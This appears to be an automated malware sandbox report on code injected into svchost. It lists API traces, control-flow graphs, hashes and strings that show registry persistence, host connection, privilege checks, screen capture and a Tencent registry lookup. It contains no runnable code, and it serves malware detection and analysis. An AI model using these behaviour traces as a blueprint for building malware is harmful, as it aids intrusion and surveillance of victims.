• _memset.LIBCMT ref: 02585669
• _memset.LIBCMT ref: 0258568D
• _memset.LIBCMT ref: 0258569F
• VirtualAlloc.KERNELBASE(00000000,000311BF,00003000,00000040), ref: 02585726
• RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02585799
• RegDeleteValueW.KERNELBASE(?,d33f351a4aeea5e608853d1a56661059), ref: 025857AC
• RegSetValueExW.KERNELBASE(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000065), ref: 025857C4
• RegCloseKey.KERNELBASE(?), ref: 025857CE
• Sleep.KERNELBASE(00000BB8), ref: 025857FE
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
• String ID: !jWW$.$Console\0$_$a87213ca198a1f1365c74ba3f45f0381$d33f351a4aeea5e608853d1a56661059$e$i$l${vU_
• API String ID: 354323817-3191071932
• Opcode ID: bf97293ba02ae8b67120f00d2bf4636e1c430e078b2578dd72fec8eb91fbf81b
• Instruction ID: c4b38db2efa0160173fd469a63f7b28adcadee2f452740bdf211c2c935f9b56e
• Opcode Fuzzy Hash: bf97293ba02ae8b67120f00d2bf4636e1c430e078b2578dd72fec8eb91fbf81b
• Instruction Fuzzy Hash: 8891D7B5A40304ABEB20EF60DC44FAA77BDFB85710F414559F909AB240E7B09E54CF69

Control-flow Graph
APIs
• ResetEvent.KERNEL32(?), ref: 02582D8B
• InterlockedExchange.KERNEL32(?,00000000), ref: 02582D97
• timeGetTime.WINMM ref: 02582D9D
• socket.WS2_32(00000002,00000001,00000006), ref: 02582DCA
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02582DF6
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02582E02
• lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02582E21
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02582E2D
• gethostbyname.WS2_32(00000000), ref: 02582E3B
• htons.WS2_32(?), ref: 02582E5D
• connect.WS2_32(?,?,00000010), ref: 02582E7B
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
• String ID: 0u
• API String ID: 640718063-3203441087
• Opcode ID: b672445c0f5b4b1ac5483eed8031bcd5367a67eb384ddf1eb5e3a7f34a00c445
• Instruction ID: c9d73baa4d12fa5ab5a88e82f9e43c595f5ae39ab48e2724df5d295ecb688148
• Opcode Fuzzy Hash: b672445c0f5b4b1ac5483eed8031bcd5367a67eb384ddf1eb5e3a7f34a00c445
• Instruction Fuzzy Hash: 14615071A40304AFE720EFA4DC45FAAB7B9FF48710F504519FA46E72C0D7B0A9149B69

Control-flow Graph
APIs
• ResetEvent.KERNEL32(?), ref: 04DF2DBB
• InterlockedExchange.KERNEL32(?,00000000), ref: 04DF2DC7
• timeGetTime.WINMM ref: 04DF2DCD
• socket.WS2_32(00000002,00000001,00000006), ref: 04DF2DFA
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04DF2E26
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DF2E32
• lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04DF2E51
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DF2E5D
• gethostbyname.WS2_32(00000000), ref: 04DF2E6B
• htons.WS2_32(?), ref: 04DF2E8D
• connect.WS2_32(?,?,00000010), ref: 04DF2EAB
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
• String ID: 0u
• API String ID: 640718063-3203441087
• Opcode ID: 8c3abe4b13f70f474b14b49141ffbb4c4036da4905ea349e5b866d4c454260b7
• Instruction ID: c4aad1646a616398a0fb9e5e8af894ee2ef0dd1cb6daa12cedb7e9bc9f4993ed
• Opcode Fuzzy Hash: 8c3abe4b13f70f474b14b49141ffbb4c4036da4905ea349e5b866d4c454260b7
• Instruction Fuzzy Hash: 886181B1A40304AFE720DFA5DC45FAAB7B8FF48711F10461EFA55A72D0D6B4A9048B64

Control-flow Graph
APIs
• GetCurrentProcessId.KERNEL32(75A773E0), ref: 04DF6AE4
• wsprintfW.USER32 ref: 04DF6AF7
  • Part of subcall function 04DF6960: GetCurrentProcessId.KERNEL32(E179827C,00000000,00000000,75A773E0,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF6988
  • Part of subcall function 04DF6960: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF6997
  • Part of subcall function 04DF6960: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF69B0
  • Part of subcall function 04DF6960: CloseHandle.KERNEL32(00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF69BB
• _memset.LIBCMT ref: 04DF6B12
• GetVersionExW.KERNEL32(?), ref: 04DF6B2B
• GetCurrentProcess.KERNEL32(00000008,?), ref: 04DF6B62
• OpenProcessToken.ADVAPI32(00000000), ref: 04DF6B69
• GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04DF6B8F
• GetLastError.KERNEL32 ref: 04DF6B99
• LocalAlloc.KERNEL32(00000040,?), ref: 04DF6BAD
• GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 04DF6BD5
                                                                                                              • GetSidSubAuthorityCount.ADVAPI32 ref: 04DF6BE8
                                                                                                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 04DF6BF6
                                                                                                              • LocalFree.KERNEL32(?), ref: 04DF6C05
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DF6C12
                                                                                                              • wsprintfW.USER32 ref: 04DF6C6B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                              • String ID: -N/$NO/$None/%s
                                                                                                              • API String ID: 3036438616-3095023699
                                                                                                              • Opcode ID: 4996705251c7317657f9504f8597b9d0580fa36276456cc0fcfe474f1f63d4ef
                                                                                                              • Instruction ID: 6ebf75ad7dceb3dbf7982e9c98f0114784134a8972e9b43f7670b6632d96693c
                                                                                                              • Opcode Fuzzy Hash: 4996705251c7317657f9504f8597b9d0580fa36276456cc0fcfe474f1f63d4ef
                                                                                                              • Instruction Fuzzy Hash: 1541C970A40214ABEB309F61DD89FEA7B78FB09715F014159FB8592150E639EE91CF60

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 484 4dfad60-4dfad7b 485 4dfad7d-4dfadab RegOpenKeyExW 484->485 486 4dfadd4-4dfaddf 484->486 487 4dfadad-4dfadc3 RegQueryValueExW 485->487 488 4dfadc9-4dfadce 485->488 489 4dfb895-4dfb89b call 4dfce50 486->489 490 4dfade5-4dfadec 486->490 487->488 488->486 492 4dfb89e-4dfb8a4 488->492 489->492 493 4dfae3a-4dfae41 490->493 494 4dfb033-4dfb0eb call 4dff757 call 4e067c0 call 4dff044 call 4e076b0 call 4dff757 call 4dfcf70 call 4dff044 490->494 493->492 497 4dfae47-4dfae79 call 4dff757 call 4e067c0 493->497 540 4dfb1b2-4dfb1d9 call 4dffa79 CloseHandle 494->540 541 4dfb0f1-4dfb13e call 4e076b0 RegCreateKeyW 494->541 506 4dfae7b-4dfae8f wsprintfW 497->506 507 4dfae92-4dfae9e 497->507 506->507 509 4dfaeea-4dfaf41 call 4dff044 call 4e076b0 call 4df2ba0 call 4dff04f * 2 507->509 510 4dfaea0 507->510 512 4dfaea4-4dfaeaf 510->512 516 4dfaeb0-4dfaeb6 512->516 519 4dfaeb8-4dfaebb 516->519 520 4dfaed6-4dfaed8 516->520 524 4dfaebd-4dfaec5 519->524 525 4dfaed2-4dfaed4 519->525 526 4dfaedb-4dfaedd 520->526 524->520 529 4dfaec7-4dfaed0 524->529 525->526 530 4dfaedf-4dfaee8 526->530 531 4dfaf44-4dfaf59 526->531 529->516 529->525 530->509 530->512 534 4dfaf60-4dfaf66 531->534 537 4dfaf68-4dfaf6b 534->537 538 4dfaf86-4dfaf88 534->538 543 4dfaf6d-4dfaf75 537->543 544 4dfaf82-4dfaf84 537->544 539 4dfaf8b-4dfaf8d 538->539 545 4dfaf8f-4dfaf91 539->545 546 4dfaffe-4dfb030 call 4dffa79 CloseHandle call 4dff04f 539->546 561 4dfb19a-4dfb1af RegCloseKey call 4dffb19 541->561 562 4dfb140-4dfb18f call 4dff044 call 4df5a80 RegDeleteValueW RegSetValueExW 541->562 543->538 550 4dfaf77-4dfaf80 543->550 544->539 552 4dfafa5-4dfafac 545->552 553 4dfaf93-4dfaf9e call 4dff04f 545->553 550->534 550->544 559 4dfafae-4dfafb9 call 4dffb19 552->559 560 4dfafc0-4dfafc4 552->560 553->552 559->560 568 4dfafc6-4dfafcf call 4dff04f 560->568 569 4dfafd5-4dfaff9 call 4dff070 560->569 561->540 562->561 580 4dfb191-4dfb197 call 4dffb19 562->580 568->569 569->509 580->561
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 04DFADA3
                                                                                                              • RegQueryValueExW.KERNELBASE(?,IpDatespecial,00000000,?,00000000,?), ref: 04DFADC3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: OpenQueryValue
                                                                                                              • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                              • API String ID: 4153817207-1338088003
                                                                                                              • Opcode ID: c52b6cf2a79649bdb3448fdd2d98d9f998e9ca38454eedcfd8fa942c27872e5d
                                                                                                              • Instruction ID: 03f4e3768b8e39178d20fcb5e466a4d9120dde857a2cf9d81b5d684773ce72e5
                                                                                                              • Opcode Fuzzy Hash: c52b6cf2a79649bdb3448fdd2d98d9f998e9ca38454eedcfd8fa942c27872e5d
                                                                                                              • Instruction Fuzzy Hash: 04C1B0B1700201ABE720EF24DC45B6BB7A8FF94718F05452DEE499B381E675FA04C7A2

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 583 4df61a0-4df61f5 call 4e067c0 call 4e00099 588 4df61f7-4df61fe 583->588 589 4df6251-4df6278 CoCreateInstance 583->589 590 4df6200-4df6202 call 4df60a0 588->590 591 4df627e-4df62d2 589->591 592 4df6472-4df647f lstrlenW 589->592 599 4df6207-4df6209 590->599 600 4df645a-4df6468 591->600 601 4df62d8-4df62f2 591->601 593 4df6491-4df64a0 592->593 594 4df6481-4df648b lstrcatW 592->594 597 4df64aa-4df64ca call 4dff05a 593->597 598 4df64a2-4df64a7 593->598 594->593 598->597 603 4df622b-4df624f call 4e00099 599->603 604 4df620b-4df6229 lstrcatW * 2 599->604 600->592 605 4df646a-4df646f 600->605 601->600 610 4df62f8-4df6304 601->610 603->589 603->590 604->603 605->592 611 4df6310-4df63b3 call 4e067c0 wsprintfW RegOpenKeyExW 610->611 614 4df6439-4df644f 611->614 615 4df63b9-4df640a call 4e067c0 RegQueryValueExW 611->615 618 4df6452-4df6454 614->618 619 4df642c-4df6433 RegCloseKey 615->619 620 4df640c-4df642a lstrcatW * 2 615->620 618->600 618->611 619->614 620->619
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF61DB
                                                                                                              • lstrcatW.KERNEL32(04E21F10,04E1610C,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF621D
                                                                                                              • lstrcatW.KERNEL32(04E21F10,04E16388,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF6229
                                                                                                              • CoCreateInstance.OLE32(04E13480,00000000,00000017,04E167BC,?,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF6270
                                                                                                              • _memset.LIBCMT ref: 04DF631E
                                                                                                              • wsprintfW.USER32 ref: 04DF6386
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 04DF63AF
                                                                                                              • _memset.LIBCMT ref: 04DF63C6
                                                                                                                • Part of subcall function 04DF60A0: _memset.LIBCMT ref: 04DF60CC
                                                                                                                • Part of subcall function 04DF60A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04DF60D8
                                                                                                              Strings
                                                                                                              • CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 04DF6380
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
                                                                                                              • API String ID: 1221949200-4035668053
                                                                                                              • Opcode ID: 3576b29bcec4ae457c5d4e3d6870f69ec032c2871ce21aa9d5ba2698460362ff
                                                                                                              • Instruction ID: 8016a2833d3563278025a89b845d759a1c1847ac34addffe055898e1b94796ec
                                                                                                              • Opcode Fuzzy Hash: 3576b29bcec4ae457c5d4e3d6870f69ec032c2871ce21aa9d5ba2698460362ff
                                                                                                              • Instruction Fuzzy Hash: 448191B1A40228ABEB24DB65CC41FAAB7B8EF48704F054188F719A7155D774BE81CFA4

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateMutexW.KERNELBASE(00000000,00000000,2024. 9.23), ref: 04DF5FB6
                                                                                                              • GetLastError.KERNEL32 ref: 04DF5FBE
                                                                                                              • Sleep.KERNEL32(000003E8), ref: 04DF5FD5
                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,2024. 9.23), ref: 04DF5FE0
                                                                                                              • GetLastError.KERNEL32 ref: 04DF5FE2
                                                                                                              • _memset.LIBCMT ref: 04DF6009
                                                                                                              • lstrlenW.KERNEL32(?), ref: 04DF6016
                                                                                                              • lstrcmpW.KERNEL32(?,04E16354), ref: 04DF603D
                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 04DF6048
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 04DF6055
                                                                                                              • GetConsoleWindow.KERNEL32 ref: 04DF605F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                              • String ID: 2024. 9.23$key$open
                                                                                                              • API String ID: 2922109467-483306253
                                                                                                              • Opcode ID: 357f7ad544ac24afdf02df021b4577ef4ee9d3d06016ef955c39b30804ff483b
                                                                                                              • Instruction ID: 408c3eb67cc0bf634bbad7e4a5a5ee8db0bf91bcc730c26196f1900827b46674
                                                                                                              • Opcode Fuzzy Hash: 357f7ad544ac24afdf02df021b4577ef4ee9d3d06016ef955c39b30804ff483b
                                                                                                              • Instruction Fuzzy Hash: 582126727803009BF724EF75EC46B5AB398EB84705F150819EB04971E0EA74FA09CBA3

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(ntdll.dll,75A773E0,?,?,?,04DF5611,0000035E,000002FA), ref: 04DF74EC
                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 04DF7502
                                                                                                              • swprintf.LIBCMT ref: 04DF753F
                                                                                                                • Part of subcall function 04DF7460: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF748D
                                                                                                                • Part of subcall function 04DF7460: GetProcAddress.KERNEL32(00000000), ref: 04DF7494
                                                                                                                • Part of subcall function 04DF7460: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF74A2
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 04DF7597
                                                                                                              • RegQueryValueExW.KERNELBASE(000002FA,ProductName,00000000,00000001,00000000,?), ref: 04DF75B3
                                                                                                              • RegCloseKey.KERNELBASE(000002FA), ref: 04DF75D6
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,04DF5611,0000035E,000002FA), ref: 04DF75E8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                              • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                              • API String ID: 2158625971-3190923360
                                                                                                              • Opcode ID: 08d6d9af0aeb14f00d072a39597d411bcca22e2f529a9f0ca466054ee7ecffde
                                                                                                              • Instruction ID: ea8ffdaf0861900781f633cc8b0aea78977fd51b5950cbcd85605d4b747bc24a
                                                                                                              • Opcode Fuzzy Hash: 08d6d9af0aeb14f00d072a39597d411bcca22e2f529a9f0ca466054ee7ecffde
                                                                                                              • Instruction Fuzzy Hash: 97318675B402087BE724DFA4DC45FFFB7BCEB48700F114519BB06A6285EA74BA008B60

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000002,?,E179827C,?,00000000,?), ref: 04DFC0EE
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 04DFC0FA
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 04DFC10F
                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 04DFC125
                                                                                                              • EnterCriticalSection.KERNEL32(04E1FB64), ref: 04DFC163
                                                                                                              • LeaveCriticalSection.KERNEL32(04E1FB64), ref: 04DFC174
                                                                                                                • Part of subcall function 04DF9E30: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04DF9E54
                                                                                                                • Part of subcall function 04DF9E30: GdipDisposeImage.GDIPLUS(?), ref: 04DF9E68
                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 04DFC19C
                                                                                                                • Part of subcall function 04DFA4B0: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 04DFA4DD
                                                                                                                • Part of subcall function 04DFA4B0: _free.LIBCMT ref: 04DFA553
                                                                                                              • GetHGlobalFromStream.OLE32(?,?), ref: 04DFC1BD
                                                                                                              • GlobalLock.KERNEL32(?), ref: 04DFC1C7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 04DFC1DF
                                                                                                                • Part of subcall function 04DF9BF0: DeleteObject.GDI32(?), ref: 04DF9C22
                                                                                                                • Part of subcall function 04DF9BF0: EnterCriticalSection.KERNEL32(04E1FB64,?,?,?,04DF9BCB), ref: 04DF9C33
                                                                                                                • Part of subcall function 04DF9BF0: EnterCriticalSection.KERNEL32(04E1FB64,?,?,?,04DF9BCB), ref: 04DF9C48
                                                                                                                • Part of subcall function 04DF9BF0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,04DF9BCB), ref: 04DF9C54
                                                                                                                • Part of subcall function 04DF9BF0: LeaveCriticalSection.KERNEL32(04E1FB64,?,?,?,04DF9BCB), ref: 04DF9C65
                                                                                                                • Part of subcall function 04DF9BF0: LeaveCriticalSection.KERNEL32(04E1FB64,?,?,?,04DF9BCB), ref: 04DF9C6C
                                                                                                              • GlobalSize.KERNEL32(00000000), ref: 04DFC1F5
                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 04DFC271
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 04DFC299
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1483550337-0
                                                                                                              • Opcode ID: dcff3bf4e04c4621e72036a75d2b486d4d9ac23e530a20866b712156c0b4ae69
                                                                                                              • Instruction ID: 1c7763983c23cd8bafade50d166212a2bbda68e83af65944d67574aea88953fd
                                                                                                              • Opcode Fuzzy Hash: dcff3bf4e04c4621e72036a75d2b486d4d9ac23e530a20866b712156c0b4ae69
                                                                                                              • Instruction Fuzzy Hash: 38612DB1E00208AFDB10EFE9DC8499EBBB9FF48715F11452AE915A7355DB34A901CFA0

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF6512
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 04DF6532
                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 04DF6574
                                                                                                              • _memset.LIBCMT ref: 04DF65B0
                                                                                                              • _memset.LIBCMT ref: 04DF65DE
                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000B9C,75A773E0), ref: 04DF660A
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000B9C,75A773E0), ref: 04DF6613
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000B9C,75A773E0), ref: 04DF6625
                                                                                                              • RegCloseKey.ADVAPI32(?,00000000,00000B9C,75A773E0), ref: 04DF6675
                                                                                                              • lstrlenW.KERNEL32(?), ref: 04DF6685
                                                                                                              Strings
                                                                                                              • Software\Tencent\Plugin\VAS, xrefs: 04DF6528
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                              • String ID: Software\Tencent\Plugin\VAS
                                                                                                              • API String ID: 2921034913-3343197220
                                                                                                              • Opcode ID: 8ff85024897bdbd4bf9ae2bd56311c40b4612a545ca4472c54291dc5c25a3fab
                                                                                                              • Instruction ID: e8a010625a6614283c70939777f8fab9e67fa738637c9cd8682d0924bcc5ca96
                                                                                                              • Opcode Fuzzy Hash: 8ff85024897bdbd4bf9ae2bd56311c40b4612a545ca4472c54291dc5c25a3fab
                                                                                                              • Instruction Fuzzy Hash: 5C4186F5A40218ABEB30DB54DD85FEAB37CEB44704F0045D9E709B7081EA71BA858FA4

                                                                                                              Control-flow Graph (graph image not reproduced here)
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF631E
                                                                                                              • wsprintfW.USER32 ref: 04DF6386
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 04DF63AF
                                                                                                              • _memset.LIBCMT ref: 04DF63C6
                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,?,?,?), ref: 04DF6402
                                                                                                              • lstrcatW.KERNEL32(04E21F10,?), ref: 04DF641E
                                                                                                              • lstrcatW.KERNEL32(04E21F10,04E16388), ref: 04DF642A
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 04DF6433
                                                                                                              • lstrlenW.KERNEL32(04E21F10,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF6477
                                                                                                              • lstrcatW.KERNEL32(04E21F10,04E16404,?,E179827C,00000B9C,00000000,75A773E0), ref: 04DF648B
                                                                                                              Strings
                                                                                                              • CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 04DF6380
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
                                                                                                              • API String ID: 1671694837-4035668053
                                                                                                              • Opcode ID: 7339a97b84cf4155b2b0e62911b37ee9bc20b6da22813b705ed75df402005ae9
                                                                                                              • Instruction ID: 42a05fd88655efdbb4450598255c77087c2a9167f115501f9429faac1100ac12
                                                                                                              • Opcode Fuzzy Hash: 7339a97b84cf4155b2b0e62911b37ee9bc20b6da22813b705ed75df402005ae9
                                                                                                              • Instruction Fuzzy Hash: 7D41A1B1A40228ABDB34DB50CC50FEEB7B8AF48705F0441C8F749A7181DA74AB81CF64
                                                                                                              APIs
                                                                                                              • GetLogicalDriveStringsW.KERNELBASE(000003E8,?,75A773E0,00000B9C,00000000), ref: 04DF8182
                                                                                                              • lstrcmpiW.KERNEL32(?,A:\), ref: 04DF81B6
                                                                                                              • lstrcmpiW.KERNEL32(?,B:\), ref: 04DF81C6
                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 04DF81F6
                                                                                                              • lstrlenW.KERNEL32(?), ref: 04DF8207
                                                                                                              • __wcsnicmp.LIBCMT ref: 04DF821E
                                                                                                              • lstrcpyW.KERNEL32(00000B9C,?), ref: 04DF8254
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 04DF8278
                                                                                                              • lstrcatW.KERNEL32(?,00000000), ref: 04DF8283
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
